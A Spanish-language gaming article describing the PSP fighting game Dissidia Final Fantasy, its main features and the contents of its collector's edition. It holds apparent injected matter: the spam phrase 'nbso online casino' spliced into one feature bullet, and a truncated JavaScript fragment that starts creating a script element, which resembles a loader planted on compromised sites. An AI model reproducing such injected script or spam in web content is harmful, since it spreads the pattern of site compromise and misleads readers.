Dissidia Final Fantasy: detalles & video

dissidia-300x162

Este juego de lucha para la PSP que tan sólo los creadores de la mitica saga de los Final Fantasy podían realizar, a modo de celebración de los 85 millones de copias que han vendido.

En Dissidia Final Fantasy podrás encontrar la mayor colección de personajes de Final Fantasy jamás vista en un juego de lucha y deberás decantarte por ayudar a Cosmos, la diosa de la armonía, o a Caos, dios de la discordia.

Este juego nos brinda con una nueva experiencia de juego de lucha, la capacidad de personalizar tus personajes, buenas graficas y audio de primerisima calidad que llevan a un nuevo nivel a la PSP.

- Características principales:

* Increíbles batallas 3D: Este nuevo y emocionante sistema permite que tu personaje pueda correr por las paredes, volar por el cielo y ejecutar terribles ataques; todo ello con una maniobrabilidad de lo más intuitiva.
* Personalización máxima: A medida que tu personaje va creciendo quedan disponibles muchas acciones, habilidades y equipo. Los personajes personalizados pueden ser utilizados en línea en una gran variedad de opciones.
* Gran carga emocional en la historia: ¿Por qué han sido reunidos estos guerreros? Una emocionante historia os espera, presentada con maravillosas escenas de vídeo y un doblaje en inglés muy cuidado.
* Comunidad de usuarios: Desafía a otros jugadores vía ad-hoc o en línea. Intercambia tarjetas de amigo, crea objetos y comparte personajes de la I.A. con otros jugadores e incluso podrás combatir en batallas virtuales de I.A. gracias al sistema ad hoc de la PSP.
* Características nuevas no presentes nbso online casino en la versión japonesa: Las nuevas características incluyen la modalidad Arcade, un juego mejor balanceado, nuevos tutoriales, escenas de vídeo adicionales y otras cosas.
* Localizado para los territorios PAL, con subtítulos y textos de pantalla en castellano.

- La Edición Limitada de Coleccionista:

* Estuche especial del Final Fantasydissidia
* Copia con caja del juego Dissidia Final Fantasy
* Mini-CD de la mejor selección de la banda sonora de Dissidia Final Fantasy: El Mini-CD de la mejor selección de la banda sonora de Dissidia Final Fantasy incluye una selección de canciones del juego especialmente escogidas para esta Edición Especial por el compositor Takeharu Ishimoto. El Mini-CD se entrega dentro de un estuche único que contiene notas escritas por Takeharu Ishimoto.
* Libro artístico de 48 páginas y tapa dura “The Art of Dissidia Final Fantasy”: presentando imágenes de los personajes, arte de GC y mucho más acerca de la producción del juego.
* Mini guía oficial de juegos Brady: Guía de 32 páginas impresa a color, con imágenes de los personajes, descripciones y una guía del juego para ayudarte a ganar la batalla.
* Litografías exclusivas: 2 litografías exclusivas, dentro de un pergamino sellado exclusivo de Dissidia Final Fantasy, con imágenes nunca utilizadas para promocionar la versión original japonesa del juego.

var d=document;var s=d.createElement(‘script’);

Share This Post

Recent Articles

© 2017 gamers.pe. All rights reserved. Site Admin · Entries RSS · Comments RSS
Powered by WordPress · Designed by Theme Junkie